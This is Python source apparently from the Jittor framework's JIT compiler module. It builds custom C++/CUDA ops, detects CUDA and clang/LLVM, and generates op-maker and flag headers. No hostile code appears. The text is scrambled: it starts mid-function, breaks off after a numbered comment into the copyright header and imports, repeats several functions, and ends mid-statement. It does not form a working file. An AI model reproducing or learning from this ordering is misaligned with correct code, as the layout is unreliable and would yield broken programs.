os.path.join(cache_path, "custom_ops") if lib_path not in os.sys.path: os.sys.path.append(lib_path) # unlock scope when initialize with lock.unlock_scope(): with jit_utils.import_scope(dlopen_flags): exec(f"import {gen_name}") mod = locals()[gen_name] if return_module: return mod return mod.ops def get_full_path_of_executable(name): full_path = os.path.abspath(name) while os.path.islink(full_path): full_path = os.path.realpath(full_path) if os.path.isfile(full_path) and os.access(full_path, os.X_OK): return full_path return get_full_path_of_executable(find_exe(name)) def compile_extern(): # compile llvm passes if cc_type != 
"clang" or platform.system() != 'Linux': return global kernel_opt_flags cache_path_llvm = os.path.join(cache_path, "llvm") jittor_path_llvm = os.path.join(jittor_path, "extern", "llvm") clang_dir = os.path.dirname(get_full_path_of_executable(cc_path)) assert clang_dir.endswith("bin") and "llvm" in clang_dir, f"Wrong clang_dir: {clang_dir}" llvm_include = os.path.abspath(os.path.join(clang_dir, "..", "include")) assert os.path.isdir(llvm_include), "LLVM include path not found" make_cache_dir(cache_path_llvm) files = os.listdir(jittor_path_llvm) # test_pass.cc is used for test link problem of llvm pass plugin test_pass_path = os.path.join(cache_path_llvm, "test_pass.cc") with open(test_pass_path, 'w') as f: f.write("int main() {return 0;}") # -fno-rtti fix link error # -Wl,-znodelete fix segfault # https://github.com/sampsyo/llvm-pass-skeleton/issues/7#issuecomment-401834287 # -D_GLIBCXX_USE_CXX11_ABI=0 fix undefined symbol: createPrinterPass # https://stackoverflow.com/questions/37366291/undefined-symbol-for-self-built-llvm-opt # try different flags try_flags = [ " -Wl,-znodelete -D_GLIBCXX_USE_CXX11_ABI=0 ", " -Wl,-znodelete ", ] found_flags_id = -1 for fname in files: for i, flag in enumerate(try_flags): if found_flags_id != -1 and found_flags_id != i: continue so_name = os.path.join(cache_path_llvm, os.path.splitext(fname)[0]+f".{i}.so") compile( cc_path, f"{cc_flags} {opt_flags} {flag} -I'{llvm_include}'", [os.path.join(jittor_path_llvm, fname)], so_name ) # if not found available flags, we test it. if found_flags_id == -1: try: s = run_cmd( f"{cc_path} {cc_flags} -Xclang -load -Xclang '{so_name}' {test_pass_path}", cache_path_llvm, print_error=False ) except Exception as e: LOG.v(f"Try flag {flag} failed: {e}") continue found_flags_id = i kernel_opt_flags += f" -Xclang -load -Xclang '{so_name}' " break else: LOG.w("Clang is used, but LLVM pass plugin is unable to link.") break LOG.vv(f"Compile extern llvm passes: {str(files)}") def check_cuda(): if not nvcc_path: return global cc_flags, has_cuda, core_link_flags, cuda_dir, cuda_lib, cuda_include, cuda_home, cuda_bin cuda_dir = os.path.dirname(get_full_path_of_executable(nvcc_path)) cuda_bin = cuda_dir cuda_home = os.path.abspath(os.path.join(cuda_dir, "..")) # try default nvidia-cuda-toolkit in Ubuntu 20.04 # assert cuda_dir.endswith("bin") and "cuda" in cuda_dir.lower(), f"Wrong cuda_dir: {cuda_dir}" cuda_include = os.path.abspath(os.path.join(cuda_dir, "..", "include")) cuda_lib = os.path.abspath(os.path.join(cuda_dir, "..", "lib64")) if nvcc_path == "/usr/bin/nvcc": # this nvcc is install by package manager cuda_lib = "/usr/lib/x86_64-linux-gnu" cuda_include2 = os.path.join(jittor_path, "extern","cuda","inc") cc_flags += f" -DHAS_CUDA -I\"{cuda_include}\" -I\"{cuda_include2}\" " if os.name == 'nt': cuda_lib = os.path.abspath(os.path.join(cuda_dir, "..", "lib", "x64")) # cc_flags += f" \"{cuda_lib}\\cudart.lib\" " cuda_lib_path = glob.glob(cuda_bin+"/cudart64*")[0] cc_flags += f" -lcudart -L\"{cuda_lib}\" -L\"{cuda_bin}\" " dll = ctypes.CDLL(cuda_lib_path, dlopen_flags) ret = dll.cudaDeviceSynchronize() assert ret == 0 else: cc_flags += f" -lcudart -L\"{cuda_lib}\" " # ctypes.CDLL(cuda_lib+"/libcudart.so", import_flags) ctypes.CDLL(cuda_lib+"/libcudart.so", dlopen_flags) has_cuda = 1 def check_cache_compile(): files = [ "src/utils/cache_compile.cc", "src/utils/log.cc", "src/utils/tracer.cc", "src/utils/jit_utils.cc", "src/utils/str_utils.cc", ] if os.name == 'nt': files = [ x.replace('/', '\\') for x in files ] global 
jit_utils_core_files jit_utils_core_files = files recompile = compile(cc_path, cc_flags+f" {opt_flags} ", files, jit_utils.cache_path+'/jit_utils_core'+extension_suffix, True) if recompile and jit_utils.cc: LOG.e("jit_utils updated, please rerun your command.") sys.exit(0) if not jit_utils.cc: with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() assert jit_utils.cc # recompile, generate cache key compile(cc_path, cc_flags+f" {opt_flags} ", files, jit_utils.cache_path+'/jit_utils_core'+extension_suffix, True) def env_or_try_find(name, bname): if name in os.environ: path = os.environ[name] if path != "": version = jit_utils.get_version(path) LOG.i(f"Found {bname}{version} at {path}") return path return try_find_exe(bname) def try_find_exe(*args): try: return find_exe(*args) except: LOG.v(f"{args[0]} not found.") return "" def check_pybt(gdb_path, python_path): if gdb_path=='' or python_path=='': return False return True # TODO: prev we use below code to check has py-bt or nor # but it is too slow, so we comment it, # find a better way to check py-bt exist # ret = sp.getoutput(f"{gdb_path} --batch {python_path} -ex 'help py-bt'") # if 'python frame' in ret: # LOG.v("py-bt found in gdb.") # return True # return False def check_debug_flags(): global is_debug is_debug = 0 if os.environ.get("debug")=="1": is_debug = 1 global cc_flags cc_flags += " -g -DNODE_MEMCHECK " cc_flags = " " # os.RTLD_NOW | os.RTLD_GLOBAL cause segfault when import torch first import_flags = os.RTLD_NOW | os.RTLD_GLOBAL if platform.system() == 'Linux': import_flags |= os.RTLD_DEEPBIND # if cc_type=="icc": # # weird link problem, icc omp library may conflict and cause segfault # import_flags = os.RTLD_NOW | os.RTLD_GLOBAL dlopen_flags = os.RTLD_NOW | os.RTLD_GLOBAL if platform.system() == 'Linux': import_flags |= os.RTLD_DEEPBIND with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() jittor_path = find_jittor_path() check_debug_flags() sys.path.append(cache_path) LOG.i(f"Jittor({__version__}) src: {jittor_path}") LOG.i(f"{jit_utils.cc_type} at {jit_utils.cc_path}{jit_utils.get_version(jit_utils.cc_path)}") LOG.i(f"cache_path: {cache_path}") with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() python_path = sys.executable # sometime python do not return the correct sys executable # this will happend when multiple python version installed ex_python_path = python_path + '.' 
+ str(sys.version_info.minor) if os.path.isfile(ex_python_path): python_path = ex_python_path # if jtcuda is already installed nvcc_path = None if install_cuda.has_installation() or os.name == 'nt': nvcc_path = install_cuda.install_cuda() if nvcc_path: nvcc_path = try_find_exe(nvcc_path) # check system installed cuda if not nvcc_path: nvcc_path = env_or_try_find('nvcc_path', 'nvcc') or \ try_find_exe('/usr/local/cuda/bin/nvcc') or \ try_find_exe('/usr/bin/nvcc') or \ try_find_exe('/opt/cuda/bin/nvcc') # if system has no cuda, install jtcuda if not nvcc_path: nvcc_path = install_cuda.install_cuda() if nvcc_path: nvcc_path = try_find_exe(nvcc_path) if nvcc_path is None: nvcc_path = "" gdb_path = env_or_try_find('gdb_path', 'gdb') addr2line_path = try_find_exe('addr2line') has_pybt = check_pybt(gdb_path, python_path) if nvcc_path: # gen cuda key for cache_path cu = "cu" v = jit_utils.get_version(nvcc_path)[1:-1] nvcc_version = list(map(int,v.split('.'))) cu += v try: r, s = sp.getstatusoutput(f"{sys.executable} -m jittor_utils.query_cuda_cc") if r==0: s = sorted(list(set(s.strip().split()))) cu += "_sm_" + "_".join(s) if "cuda_arch" not in os.environ: os.environ["cuda_arch"] = " ".join(cu) except: pass LOG.i("cuda key:", cu) cache_path = os.path.join(cache_path, cu) sys.path.append(cache_path) def check_clang_latest_supported_cpu(): output = run_cmd('clang --print-supported-cpus') apple_cpus = [l.strip() for l in output.split('\n') if 'apple-a' in l] apple_cpus_id = max([int(cpu[7:]) for cpu in apple_cpus]) return f'apple-a{apple_cpus_id}' # cc_flags += " -Wall -Werror -Wno-unknown-pragmas -std=c++14 -fPIC " cc_flags += " -Wall -Wno-unknown-pragmas -std=c++14 -fPIC " # 1. Arch/CPU specific optimization if platform.machine() in ["x86_64", "AMD64"]: cc_flags += " -march=native " elif platform.machine() == 'arm64' and platform.system() == "Darwin": cc_flags += f" -mcpu={check_clang_latest_supported_cpu()} " cc_flags += " -fdiagnostics-color=always " # 2. Non standard include path if platform.system() == 'Darwin' and platform.machine() == 'arm64': cc_flags += " -I/opt/homebrew/include " # 3. 
# *************************************************************** # Copyright (c) 2021 Jittor. All Rights Reserved. # Maintainers: Dun Liang <randonlang@gmail.com>. # This file is subject to the terms and conditions defined in # file 'LICENSE.txt', which is part of this source code package. # *************************************************************** import subprocess as sp import os import re import sys import glob import inspect import datetime import threading import platform import ctypes import platform from ctypes import cdll from ctypes.util import find_library import jittor_utils as jit_utils from jittor_utils import LOG, run_cmd, cache_path, find_exe, cc_path, cc_type, cache_path from . import pyjt_compiler from jittor_utils import lock from jittor_utils import install_cuda from jittor import __version__ import hashlib def find_jittor_path(): return os.path.dirname(__file__) def make_cache_dir(cache_path): if not os.path.isdir(cache_path): LOG.i(f"Create cache dir: {cache_path}") os.mkdir(cache_path) def shsplit(s): s1 = s.split(' ') s2 = [] count = 0 for s in s1: nc = s.count('"') + s.count('\'') if count&1: count += nc s2[-1] += " " s2[-1] += s else: count = nc s2.append(s) return s2 def remove_flags(flags, rm_flags): flags = shsplit(flags) output = [] for s in flags: ss = s.replace("\"", "") for rm in rm_flags: if ss.startswith(rm) or ss.endswith(rm): break else: output.append(s) return " ".join(output) def moveback_flags(flags, rm_flags): flags = shsplit(flags) output = [] output2 = [] for s in flags: ss = s.replace("\"", "") for rm in rm_flags: if ss.startswith(rm) or ss.endswith(rm): output2.append(s) break else: output.append(s) return " ".join(output+output2) def map_flags(flags, func): flags = shsplit(flags) output = [] for s in flags: output.append(func(s)) return " ".join(output) def compile(compiler, flags, inputs, output, combind_build=False, cuda_flags=""): def do_compile(cmd): if jit_utils.cc: return jit_utils.cc.cache_compile(cmd, cache_path, jittor_path) else: run_cmd(cmd) return True base_output = os.path.basename(output).split('.')[0] if os.name == 'nt': # windows do not combind build, need gen def combind_build = False # windows need xxxx.lib afile = output.rsplit('.', 1)[0] + ".lib" afile = os.path.join(cache_path, afile) if cc_type != 'cl': # initialize order in windows seems reversed inputs = list(inputs[::-1]) link = link + f' -Wl,--export-all-symbols,--out-implib,"{afile}" ' if not os.path.isabs(output): output = os.path.join(cache_path, output) # don't recompile object file in inputs obj_files = [] ex_obj_files = [] new_inputs = [] for name in inputs: if name[-1] in 'oab': ex_obj_files.append(name) else: new_inputs.append(os.path.join(jittor_path, name)) obj_files.append(os.path.join( cache_path, "obj_files", os.path.basename(name)+".o")) inputs = new_inputs cm = lambda s: f"\"{s}\"" cms = lambda arr: [f"\"{s}\"" for s in arr ] if len(inputs) == 1 or combind_build: cmd = f"\"{compiler}\" {' '.join(cms(inputs))} {flags} -o {cm(output)}" return do_compile(fix_cl_flags(cmd)) # split compile object file and link # remove -l -L flags when compile object files oflags = remove_flags(flags, ['-l', '-L', '-Wl,', '.lib', '-shared']) cmds = [] for input, obj_file in zip(inputs, obj_files): cc = compiler nflags = oflags cmd = f"{cm(input)} {nflags} {lto_flags} -c -o {cm(obj_file)}" if input.endswith(".cu"): if has_cuda: cmd = f"\"{nvcc_path}\" {cuda_flags} {cmd}" cmd = convert_nvcc_flags(fix_cl_flags(cmd)) else: continue else: cmd = f"\"{cc}\" {cmd}" cmd = 
fix_cl_flags(cmd) if "nan_checker" in input: # nan checker needs to disable fast_math cmd = cmd.replace("--use_fast_math", "") cmd = cmd.replace("-Ofast", "-O2") cmds.append(cmd) jit_utils.run_cmds(cmds, cache_path, jittor_path, "Compiling "+base_output) obj_files += ex_obj_files if os.name == 'nt': dumpdef_path = os.path.join(jittor_path, "utils", "dumpdef.py") cmd = f"\"{sys.executable}\" \"{dumpdef_path}\" {' '.join(cms(obj_files))} -Fo: \"{output}.def\"" do_compile(fix_cl_flags(cmd)) cmd = f"\"{compiler}\" {' '.join(cms(obj_files))} -o {cm(output)} {flags} {lto_flags}" return do_compile(fix_cl_flags(cmd)) def gen_jit_tests(): all_src = glob.glob(jittor_path+"/src/**/*.cc", recursive=True) jit_declares = [] re_def = re.compile("JIT_TEST\\((.*?)\\)") names = set() test_defs = [] for src_name in all_src: with open(src_name, 'rb') as f: src = f.read().decode('utf8') defs = re_def.findall(src) for name in defs: LOG.vv(f"Find test {name} from {src_name}") assert name not in names, f"Conflict test name {name}" names.add(name) jit_declares.append(f"JIT_TEST({name});") test_defs.append(f""" /* From {src_name} */ // @pyjt({name}) static inline void test_{name}() {{ jit_test_{name}(); }} """) jit_declares = "\n ".join(jit_declares) jit_src = f""" #pragma once #include "common.h" void expect_error(std::function<void()> func) {{ try {{ func(); }} catch (...) {{ return; }} CHECK(0) << "Missing error"; }} namespace jittor {{ {jit_declares} // @pyjt(tests) // @attrs(submodule) namespace tests {{ {"".join(test_defs)} }} }} // jittor """ LOG.vvvv(jit_src) with open(os.path.join(cache_path, "gen", "jit_tests.h"), 'w') as f: f.write(jit_src) def gen_jit_flags(): all_src = glob.glob(jittor_path+"/src/**/*.cc", recursive=True) jit_declares = [] re_def = re.compile("DEFINE_FLAG(_WITH_SETTER)?\\((.*?)\\);", re.DOTALL) flags_defs = [] visit = {} for src_name in all_src: with open(src_name, 'rb') as f: src = f.read().decode("utf8") defs = re_def.findall(src) for _, args in defs: args = args.split(",") type = args[0].strip() name = args[1].strip() if not has_cuda and "cuda" in name and name!="use_cuda": continue default = args[2].strip() doc = ",".join(args[3:]) doc = eval(f"({doc})") LOG.vv(f"Find define {name} from {src_name}") if name in visit: continue visit[name] = 1 jit_declares.append(f"DECLARE_FLAG({type}, {name});") flags_defs.append(f""" /* {name}(type:{type}, default:{default}): {doc} */ // @pyjt(__get__{name}) {type} _get_{name}() {{ return {name}; }} // @pyjt(__set__{name}) void _set_{name}({type} v) {{ set_{name}(v); }} {f'''// @pyjt(__set__{name}) void _set_{name}(bool v) {{ set_{name}(v); }} ''' if type=="int" else ""} """) jit_declares = "\n ".join(jit_declares) jit_src = f""" #include "utils/flags.h" namespace jittor {{ {jit_declares} // @pyjt(Flags) struct _Flags {{ // @pyjt(__init__) _Flags() {{}} {"".join(flags_defs)} }}; }} // jittor """ LOG.vvvv(jit_src) with open(os.path.join(cache_path, "gen", "jit_flags.h"), 'w') as f: f.write(jit_src) def gen_jit_op_maker(op_headers, export=False, extra_flags=""): def add_src( cc_func_name, cc_args, op_name, op_args, src, pybind_name, py_args, jit_cc_src, doc_string, attrs ): has_ir = set(["add", "sub", "mul", "matmul", "truediv", "floordiv", "mod", "divmod", "pow", "lshift", "rshift", "and", "xor", "or"]) pybind_names = [ s.strip() for s in pybind_name.split(",")] cc_make_args = [ arg.replace("VarHolder*", "Var*") for arg in cc_args ] op_make_args = [ arg.replace("->var", "") for arg in op_args ] py_args = [ arg.replace("Var*", "VarHolder*") for arg 
in py_args ] op_args = [] cc_args_with_default = [] for i, arg in enumerate(cc_args): pre_arg = arg.split()[-1].split('=')[0] op_arg = None if arg.startswith("VarHolder*"): op_arg = pre_arg+"->var" elif arg.startswith("vector<VarHolder*>"): op_arg = f"convert({pre_arg})" if "&&" in arg: if op_arg == None: op_arg = "move("+pre_arg+")" op_make_args[i] = "move("+pre_arg+")" if op_arg==None: op_arg = pre_arg op_args.append(op_arg) py_arg = py_args[i] if "_a=" not in py_arg: cc_args_with_default.append(arg) continue py_arg = py_arg.split("_a=")[1] cc_args_with_default.append(arg + "=" + py_arg) cc_args = cc_args_with_default # steps of Op creation: # 1. new op # 2. new output var (create_output in op constructor) # 3. take over op's output VarPtr from outputs_holder # 4. set op's output # 5. set op's input # 6. infer shape(op->init()) if "multiple_outputs" not in attrs: jit_cc_src.append(f""" VarPtr make_{cc_func_name}({", ".join(cc_make_args)}) {{ auto _op = new {op_name}({", ".join(op_make_args)}); if (_op->outputs_holder.size() != 1) {{ delete _op; LOGf << "Wrong output size of" << \"{op_name}\"; }} if (_op->flags.get(NodeFlags::_forwarded)) {{ VarPtr _out(move(_op->outputs_holder[0])); delete _op; return _out; }} _op->outputs_holder[0]->set_inputs({{_op}}); VarPtr _out(move(_op->outputs_holder[0])); {src.replace("->var","")}; _op->init(); return _out; }} """) else: jit_cc_src.append(f""" vector<VarPtr> make_{cc_func_name}({", ".join(cc_make_args)}) {{ auto _op = new {op_name}({", ".join(op_make_args)}); if (_op->flags.get(NodeFlags::_forwarded)) {{ vector<VarPtr> _outs = move(_op->outputs_holder); delete _op; return _outs; }} vector<VarPtr> _outs = move(_op->outputs_holder); for (uint i=0; i<_outs.size(); i++) _outs[i]->set_inputs({{_op}}); {src.replace("->var","")}; _op->init(); return _outs; }} """) if pybind_name == 'None': return pyjt_names = [] for pybind_name in pybind_names: if pybind_name.startswith("__"): pyjt_names.append("Var."+pybind_name) else: pyjt_names.append(pybind_name) if len(cc_args)>0 and cc_args[0].startswith("VarHolder* "): pyjt_names.append("Var."+pybind_name) if "multiple_outputs" in attrs: jit_cc_src.append(f""" /*{doc_string}*/ // @pyjt({",".join(pyjt_names)}) vector<VarHolder*> {cc_func_name}({", ".join(cc_args)}) {{ { f'return make_vh_vector(make_{cc_func_name}({", ".join(op_args)}));' if "replace_outputs" not in attrs else f'''auto rt = make_vh_vector(make_{cc_func_name}({", ".join(op_args)})); ASSERT(rt.size() == outputs.size()); for (int i=0; i<outputs.size(); i++) outputs[i]->assign(rt[i]); return rt; '''} }} """) else: jit_cc_src.append(f""" /*{doc_string}*/ // @pyjt({",".join(pyjt_names)}) VarHolder* {cc_func_name}({", ".join(cc_args)}) {{ return new VarHolder(make_{cc_func_name}({", ".join(op_args)})); }} """) need_ir_define = False ir_name = None for pybind_name in pybind_names: if pybind_name.startswith("__") and pybind_name[2:-2] in has_ir: need_ir_define = True assert ir_name is None ir_name = pybind_name[2:-2] if need_ir_define: assert len(cc_args)>0 and cc_args[0].startswith("VarHolder* ") this = cc_args[0].split()[-1] jit_cc_src.append(f""" // @pyjt(Var.__i{ir_name}__) // @attrs(return_self) VarHolder* i{cc_func_name}({", ".join(cc_args)}) {{ *{this} = make_{cc_func_name}({", ".join(op_args)}); return {this}; }} """) assert len(cc_args)>1 and cc_args[1].startswith("VarHolder* "), cc_args r_cc_args = [cc_args[1], cc_args[0]] + cc_args[2:] r_py_args = [py_args[1], py_args[0]] + py_args[2:] jit_cc_src.append(f""" VarHolder* r{cc_func_name}({", 
".join(r_cc_args)}) {{ return new VarHolder(make_{cc_func_name}({", ".join(op_args)})); }} """) jit_cc_src = [] jit_headers = "" initer = [] pybind_reg = '(/\\*(.*?)\\*/\\s*)?(//\\s*@pybind\\(([^\\n]*)\\)\\s*)?' pybind_attrs_reg = pybind_reg + '(//\\s*@attrs\\(([^\\n]*)\\)\\s*)?' for header in op_headers: # xxx_xxx_op name = os.path.basename(header) name = os.path.splitext(name)[0] # xxx_xxx assert name.endswith("_op") func_name = name[:-3] # XxxXxxOp name2 = map(lambda s:s[:1].upper() + s[1:], name.split('_')) name2 = "".join(name2) with open(header, encoding='utf8') as f: src = f.read() # XxxXxxOp(args) res = re.findall(pybind_attrs_reg + '[^~]('+name2+"\\([^\\n]*\\))", src, re.S) assert len(res) >= 1, "Wrong op args in " + header # registe op cc_name = header[:-2] + ".cc" constructors = [] for i in range(len(res)): name = 'make_'+func_name+'_'*i constructors.append(f"{{ &typeid(&{name}), (void*)&{name} }}") constructors = ",".join(constructors) var_member_reg = r"\n\s*Var\b(.*);" var_member_match = re.findall(var_member_reg, src) var_member_match = " ".join(var_member_match) for c in "*,": var_member_match = var_member_match.replace(c, " ") var_member = var_member_match.split() LOG.vv("var_member_match "+var_member_match) LOG.vv("var_member "+str(var_member)) var_member_src = [ f"VAR_MEMBER_NAME_AND_OFFSET({name}, {name2})" for name in var_member ] var_member_src = ",".join(var_member_src) initer.append(f'\n op_registe({{ "{func_name}", R"({cc_name})", extra_flags, {{{constructors}}}, {{{var_member_src}}} }});') for hid, h_def in enumerate(res): h_def = list(h_def) # // @attrs(...) attrs = {} if h_def[4] != "": attrs = pyjt_compiler.parse_attrs(h_def[5]) del h_def[4:6] # /* doc_string */ # // @pybind(bind_name) # XxxXxxOp(args_def) doc_string = h_def[1].strip() h_def = h_def[2:] args_def = h_def[2][len(name2)+1:-1] bind_name = h_def[1] if bind_name == "": bind_name = func_name if args_def=="": args = [] else: args = list(map(lambda s: s.split()[-1].split('=')[0], args_def.split(','))) # py_args: "arg"_a=default py_args = [] new_args_def = [] new_args = [] # source of convert VarHolder* to Var* vh2v_src = [] more_src = [] for arg, arg_def in zip(args, args_def.split(',')): py_arg = f'"{arg}"_a' if '=' in arg_def: py_arg += "=" + arg_def.split('=')[-1] arg_def = arg_def.split('=')[0] py_args.append(py_arg) arg_type = arg_def[:-(len(arg)+1)].strip() if arg_type == "Var*": new_args_def.append("VarHolder* " + arg) vh2v_src.append(arg + "->var") new_args.append(arg + "->var") elif arg_type.startswith("vector<Var*>"): new_args_def.append( arg_type.replace("Var", "VarHolder")+' '+arg) new_args.append(arg) more_src.append(f"_op->add_inputs({arg});") elif arg_type.startswith("VarSlices"): new_args_def.append(arg_def) new_args.append(arg) more_src.append(f""" vector<Var*> svars; for (int i=0; i<_op->vs.n; i++) if (_op->vs.slices[i].is_var()) svars.push_back(_op->vs.slices[i].var); _op->add_inputs(svars);""") else: new_args_def.append(arg_def) new_args.append(arg) vh2v_src = "_op->set_inputs({" + ", ".join(vh2v_src) + "});" + \ "".join(more_src) LOG.vvvv(f"Find op: {name2} args: {new_args}") # if header.startswith("src/"): # jit_headers += f"#include \"{header[4:]}\"\n" # else: jit_headers += f"#include \"{header}\"\n" add_src( func_name+'_'*hid, new_args_def, name2, new_args, vh2v_src, bind_name, py_args, jit_cc_src, doc_string, attrs ) if func_name in ["binary", "unary", "reduce"]: # generate binary op alias with open(os.path.join(jittor_path, f"src/ops/{func_name}_op.cc"), encoding="utf-8") as 
f: src = f.read() src = src.split(f"unordered_set<string> {func_name}_ops = ""{")[1].split("};")[0] match_result = re.findall(pybind_reg + "\"([a-z_A-Z0-9]*)\"", src, re.S) # remove /* doc_string */ pattern res2 = [ (_[3], _[4]) for _ in match_result ] LOG.vvvv(f"All supported {func_name} ops: {res2}") # remove op args if func_name == "reduce": args_def = new_args_def[:1] + new_args_def[2:] py_args_s = py_args[:1] + py_args[2:] else: args_def = new_args_def[:-1] py_args_s = py_args[:-1] # find the last type id(float64) # add "_" suffix for all function if func_name == "unary": last_tid = res2.index(("","float64")) # for each functor for tid, (bind_name, func_name2) in enumerate(res2): # get certain op doc_string doc_string2 = match_result[tid][1].strip() if len(doc_string2) == 0: doc_string2 = doc_string # add _ for types if func_name == "unary" and tid <= last_tid: func_name3 = func_name2 + "_" elif func_name == "reduce": func_name4 = func_name2 func_name2 = "reduce_" + func_name2 func_name3 = func_name2 else: func_name3 = func_name2 if len(bind_name) == 0: bind_name = func_name2 if func_name == "reduce": args = new_args[:1] + [f'ns_{func_name4}'] + new_args[2:] else: args = new_args[:-1] + [f'ns_{func_name2}'] add_src( func_name3+'_'*hid, args_def, name2, args, vh2v_src, bind_name, py_args_s, jit_cc_src, doc_string2, attrs ) jit_src = f""" #pragma once #include "pyjt/py_obj_holder.h" #include "var.h" #include "var_holder.h" #include "ops/op_register.h" {jit_headers} namespace jittor {{ // fix make_array(py::array) undefine reference #pragma GCC visibility push(default) #define JIT_NAMESPACE {export+"_maker" if export else "jit_op_maker"} // @pyjt(ops) // @attrs(submodule{",core_name="+export if export else ""}) namespace JIT_NAMESPACE {{ {"".join(jit_cc_src)} void initer() {{ string extra_flags = R"({extra_flags})"; {"".join(initer)} }} int caller = (initer(), 0); }} // JIT_NAMESPACE }} // jittor {f''' namespace jittor {{ extern void pyjt_def_{export}(PyObject*); }} static void init_module(PyModuleDef* mdef, PyObject* m) {{ mdef->m_doc = "User defined custom ops"; jittor::pyjt_def_{export}(m); }} PYJT_MODULE_INIT({export}); ''' if export else ""} """ return jit_src @lock.lock_scope() def compile_custom_op(header, source, op_name, warp=True): """Compile a single custom op header: code of op header, not path source: code of op source, not path op_name: op_name of this op, it will used for generation of header and source files, if the type name of op is XxxXxxOp, op_name should be xxx_xxx warp: if true, warp a snippet for header and source """ if warp: header = f""" #pragma once #include "op.h" #include "var.h" namespace jittor {{ {header} }} """ source = f""" #include "{op_name}_op.h" namespace jittor {{ {source} }} """ cops_dir = os.path.join(cache_path, "custom_ops") make_cache_dir(cops_dir) hname = os.path.join(cops_dir, op_name+"_op.h") ccname = os.path.join(cops_dir, op_name+"_op.cc") with open(hname, 'w') as f: f.write(header) with open(ccname, 'w') as f: f.write(source) m = compile_custom_ops([hname, ccname]) return getattr(m, op_name) @lock.lock_scope() def compile_custom_ops( filenames, extra_flags="", return_module=False, dlopen_flags=None, gen_name_ = ""): """Compile custom ops filenames: path of op source files, filenames must be pairs of xxx_xxx_op.cc and xxx_xxx_op.h, and the type name of op must be XxxXxxOp. 
extra_flags: extra compile flags return_module: return module rather than ops(default: False) return: compiled ops """ if dlopen_flags is None: dlopen_flags = os.RTLD_GLOBAL | os.RTLD_NOW if platform.system() == 'Linux': dlopen_flags |= os.RTLD_DEEPBIND srcs = {} headers = {} builds = [] includes = [] pyjt_includes = [] for name in filenames: name = os.path.realpath(name) if name.endswith(".cc") or name.endswith(".cpp") or name.endswith(".cu"): builds.append(name) if name.endswith(".h"): dirname = os.path.dirname(name) if dirname.endswith("inc"): includes.append(dirname) with open(name, "r") as f: if "@pyjt" in f.read(): pyjt_includes.append(name) bname = os.path.basename(name) bname = os.path.splitext(bname)[0] if bname.endswith("_op"): bname = bname[:-3] if name.endswith(".cc"): srcs[bname] = name elif name.endswith(".h"): includes.append(os.path.dirname(name)) headers[bname] = name assert len(srcs) == len(headers), "Source and header names not match" for name in srcs: assert name in headers, f"Header of op {name} not found" gen_name = "gen_ops_" + "_".join(headers.keys()) if gen_name_ != "": gen_name = gen_name_ if len(gen_name) > 50: gen_name = gen_name[:50] + "___hash" + hashlib.md5(gen_name.encode()).hexdigest()[:6] includes = sorted(list(set(includes))) includes = "".join(map(lambda x: f" -I\"{x}\" ", includes)) LOG.vvvv(f"Include flags:{includes}") op_extra_flags = includes + extra_flags lib_path = os.path.join(cache_path, "custom_ops") make_cache_dir(lib_path) gen_src_fname = os.path.join(lib_path, gen_name+".cc") gen_head_fname = os.path.join(lib_path, gen_name+".h") gen_lib = os.path.join(lib_path, gen_name+extension_suffix) libname = gen_name + lib_suffix op_extra_flags += f" -L\"{lib_path}\" -l\"{libname}\" " gen_src = gen_jit_op_maker(headers.values(), export=gen_name, extra_flags=op_extra_flags) pyjt_compiler.compile_single(gen_head_fname, gen_src_fname, src=gen_src) # gen src initialize first builds.insert(0, gen_src_fname) def insert_anchor(gen_src, anchor_str, insert_str): # insert insert_str after anchor_str into gen_src return gen_src.replace(anchor_str, anchor_str+insert_str, 1) for name in pyjt_includes: LOG.v("handle pyjt_include ", name) bname = os.path.basename(name).split(".")[0] gen_src_fname = os.path.join(cache_path, "custom_ops", gen_name+"_"+bname+".cc") pyjt_compiler.compile_single(name, gen_src_fname) builds.insert(1, gen_src_fname) gen_src = insert_anchor(gen_src, "namespace jittor {", f"extern void pyjt_def_{bname}(PyObject* m);") gen_src = insert_anchor(gen_src, "init_module(PyModuleDef* mdef, PyObject* m) {", f"jittor::pyjt_def_{bname}(m);") with open(gen_head_fname, "w") as f: f.write(gen_src) LOG.vvv(f"Build custum ops lib:{gen_lib}") LOG.vvvv(f"Build sources:{builds}") compile(cc_path, extra_flags+cc_flags+opt_flags+includes, builds, gen_lib) # add python path and import LOG.vvv(f"Import custum ops lib:{gen_lib}") lib_path = os.path.join(cache_path, "custom_ops") if lib_path not in os.sys.path: os.sys.path.append(lib_path) # unlock scope when initialize with lock.unlock_scope(): with jit_utils.import_scope(dlopen_flags): exec(f"import {gen_name}") mod = locals()[gen_name] if return_module: return mod return mod.ops def get_full_path_of_executable(name): full_path = os.path.abspath(name) while os.path.islink(full_path): full_path = os.path.realpath(full_path) if os.path.isfile(full_path) and os.access(full_path, os.X_OK): return full_path return get_full_path_of_executable(find_exe(name)) def compile_extern(): # compile llvm passes if cc_type != 
"clang" or platform.system() != 'Linux': return global kernel_opt_flags cache_path_llvm = os.path.join(cache_path, "llvm") jittor_path_llvm = os.path.join(jittor_path, "extern", "llvm") clang_dir = os.path.dirname(get_full_path_of_executable(cc_path)) assert clang_dir.endswith("bin") and "llvm" in clang_dir, f"Wrong clang_dir: {clang_dir}" llvm_include = os.path.abspath(os.path.join(clang_dir, "..", "include")) assert os.path.isdir(llvm_include), "LLVM include path not found" make_cache_dir(cache_path_llvm) files = os.listdir(jittor_path_llvm) # test_pass.cc is used for test link problem of llvm pass plugin test_pass_path = os.path.join(cache_path_llvm, "test_pass.cc") with open(test_pass_path, 'w') as f: f.write("int main() {return 0;}") # -fno-rtti fix link error # -Wl,-znodelete fix segfault # https://github.com/sampsyo/llvm-pass-skeleton/issues/7#issuecomment-401834287 # -D_GLIBCXX_USE_CXX11_ABI=0 fix undefined symbol: createPrinterPass # https://stackoverflow.com/questions/37366291/undefined-symbol-for-self-built-llvm-opt # try different flags try_flags = [ " -Wl,-znodelete -D_GLIBCXX_USE_CXX11_ABI=0 ", " -Wl,-znodelete ", ] found_flags_id = -1 for fname in files: for i, flag in enumerate(try_flags): if found_flags_id != -1 and found_flags_id != i: continue so_name = os.path.join(cache_path_llvm, os.path.splitext(fname)[0]+f".{i}.so") compile( cc_path, f"{cc_flags} {opt_flags} {flag} -I'{llvm_include}'", [os.path.join(jittor_path_llvm, fname)], so_name ) # if not found available flags, we test it. if found_flags_id 